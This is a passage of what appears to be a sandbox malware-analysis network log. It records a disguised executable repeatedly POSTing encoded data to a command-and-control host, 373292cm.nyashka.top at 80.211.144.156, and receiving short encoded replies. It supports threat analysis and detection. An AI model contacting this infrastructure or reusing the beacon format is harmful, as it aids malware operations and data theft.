                                    Date: Sun, 25 Aug 2024 13:46:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.84973380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:01.229039907 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:01.574091911 CEST2544OUTData Raw: 5f 56 59 55 54 49 54 5e 5b 5f 5a 51 59 56 58 53 57 5f 5d 5b 57 5e 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYUTIT^[_ZQYVXSW_][W^SZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-8/D6;76+-++9])-;",V#()_ !^/>&F$.Y/!
                                    Aug 25, 2024 15:46:01.913039923 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:02.044051886 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.84973480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:02.169291019 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:02.527226925 CEST2544OUTData Raw: 5f 55 59 57 51 40 54 5c 5b 5f 5a 51 59 51 58 54 57 5c 5d 58 57 5f 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYWQ@T\[_ZQYQXTW\]XW_SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/#A!?7#>>/<.:+7<7S71+_$#0\/.&F$.Y/=


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.84973580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:02.855420113 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:03.224140882 CEST1860OUTData Raw: 5f 53 5c 55 54 44 51 5b 5b 5f 5a 51 59 50 58 54 57 51 5d 5d 57 5e 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\UTDQ[[_ZQYPXTWQ]]W^SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;'B5><\7]+>4\()\<<7#Q4#(907 >,>&F$.Y/
                                    Aug 25, 2024 15:46:03.533451080 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:03.677320004 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1e 2a 43 22 5c 25 05 0a 52 30 0a 3a 56 3e 2e 3c 00 3e 2e 29 14 24 16 3d 17 25 10 38 55 30 05 26 01 28 3e 22 1b 24 3f 3b 10 3a 1e 2b 5d 0c 13 21 06 23 39 2a 10 26 12 24 10 29 38 3f 18 21 05 2a 1e 3c 3a 2a 08 3e 2f 3b 01 2b 29 3c 01 2a 39 22 53 2c 38 3a 06 39 33 26 1c 22 3e 2b 52 0d 11 24 10 28 5b 2d 1e 28 3e 3b 5c 35 16 30 03 33 3e 26 1c 26 1c 03 0a 27 29 23 05 25 21 25 12 25 31 25 1d 31 02 3e 5e 25 59 3d 54 22 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &*C"\%R0:V>.<>.)$=%8U0&(>"$?;:+]!#9*&$)8?!*<:*>/;+)<*9"S,8:93&">+R$([-(>;\503>&&')#%!%%1%1>^%Y=T"2#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.84973680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:02.972532988 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:03.324052095 CEST2544OUTData Raw: 5f 54 59 57 51 40 51 5a 5b 5f 5a 51 59 5e 58 50 57 50 5d 5d 57 5f 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYWQ@QZ[_ZQY^XPWP]]W_SZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,00!=+" [=>0](+']#,<#0R<49,&F$.Y/
                                    Aug 25, 2024 15:46:03.672297001 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:03.805984020 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.84973780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:03.944048882 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:04.326533079 CEST2544OUTData Raw: 5f 53 5c 54 51 45 54 5e 5b 5f 5a 51 59 52 58 52 57 5a 5d 5f 57 51 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\TQET^[_ZQYRXRWZ]_WQSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/3'@#=;# 5]*.,X?6<,4R 1S+84V9].>&F$.Y/1
                                    Aug 25, 2024 15:46:04.630203009 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:04.761840105 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.84973880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:04.888206005 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:05.245898962 CEST2536OUTData Raw: 5f 52 5c 5f 51 44 54 5a 5b 5f 5a 51 59 57 58 55 57 5e 5d 5b 57 58 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _R\_QDTZ[_ZQYWXUW^][WXSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.],U !.# #=)>(+.+=/X4/7(?<##=.>&F$.Y/-
                                    Aug 25, 2024 15:46:05.552472115 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:05.682090044 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.84973980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:05.810275078 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:06.168597937 CEST2544OUTData Raw: 5f 56 59 53 51 42 54 58 5b 5f 5a 51 59 50 58 50 57 50 5d 5b 57 5b 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYSQBTX[_ZQYPXPWP][W[SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X,E5<Y" *>=?<X=([+Y /3W#8(^"3)\;.&F$.Y/
                                    Aug 25, 2024 15:46:06.483537912 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:06.680321932 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.84974080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:06.809633970 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:07.167834044 CEST2544OUTData Raw: 5a 56 5c 5e 54 40 54 5e 5b 5f 5a 51 59 51 58 56 57 59 5d 5f 57 58 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^T@T^[_ZQYQXVWY]_WXS^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;#!>7 #5*(?.>?#\#,71()4)8>&F$.Y/=
                                    Aug 25, 2024 15:46:07.484222889 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:07.684962034 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.84974180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:07.811333895 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:08.169755936 CEST2544OUTData Raw: 5a 51 5c 50 51 40 54 5b 5b 5f 5a 51 59 51 58 52 57 5b 5d 52 57 5b 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\PQ@T[[_ZQYQXRW[]RW[S_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,'A"-4]"0%)-7(?#Y ,S!1$*)"3=;>&F$.Y/=
                                    Aug 25, 2024 15:46:08.475213051 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:08.674283028 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.84974280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:08.887392044 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:09.245925903 CEST1848OUTData Raw: 5f 56 5c 51 54 49 54 5c 5b 5f 5a 51 59 57 58 53 57 51 5d 59 57 58 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\QTIT\[_ZQYWXSWQ]YWXSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q..#![#4=\*>((?>8"/(71#<X /&F$.Y/5
                                    Aug 25, 2024 15:46:09.551217079 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:09.677927017 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 3e 1b 26 12 26 38 3c 1b 33 33 0c 54 3d 3d 02 00 2b 2d 36 01 24 38 00 04 31 3e 01 0c 26 3b 32 04 3c 2e 07 0a 24 3f 38 00 2d 1e 2b 5d 0c 13 21 04 34 04 0f 03 25 12 2f 00 2a 2b 30 06 36 05 22 5a 2b 14 3d 53 3f 11 24 13 2b 29 2f 11 2b 39 3e 11 38 16 35 5f 39 0e 3a 56 34 14 2b 52 0d 11 27 0e 28 04 21 1f 2a 10 1a 04 21 3b 2f 1d 33 03 31 0c 25 1c 2e 52 26 39 02 5b 32 0c 36 08 24 32 3e 08 26 2b 2a 12 32 2f 3d 1f 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U>&&8<33T==+-6$81>&;2<.$?8-+]!4%/*+06"Z+=S?$+)/+9>85_9:V4+R'(!*!;/31%.R&9[26$2>&+*2/=!"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.84974380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:09.005213976 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:09.355165958 CEST2544OUTData Raw: 5f 54 59 52 51 40 54 5c 5b 5f 5a 51 59 51 58 52 57 5f 5d 5c 57 5a 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYRQ@T\[_ZQYQXRW_]\WZSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y/3D#-<\"02>.0\<>*<-",R7$R?:8 "..&F$.Y/=
                                    Aug 25, 2024 15:46:09.688239098 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:09.822043896 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.84974480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:09.950496912 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:10.308393955 CEST2544OUTData Raw: 5a 51 59 55 51 40 54 5e 5b 5f 5a 51 59 5e 58 5e 57 5d 5d 5c 57 58 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQYUQ@T^[_ZQY^X^W]]\WXS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;0<6 _"3!*-4^>.!]??]4+!13<'\##>/&F$.Y/
                                    Aug 25, 2024 15:46:10.622824907 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:10.755474091 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.84974580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:10.888930082 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:11.248800039 CEST2544OUTData Raw: 5f 57 5c 57 51 40 51 59 5b 5f 5a 51 59 5f 58 55 57 5c 5d 59 57 5d 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _W\WQ@QY[_ZQY_XUW\]YW]S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/"$\70!]+->-=[(/#3#20V+:;_406,&F$.Y/
                                    Aug 25, 2024 15:46:11.570883036 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:11.775015116 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.84974680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:11.904768944 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
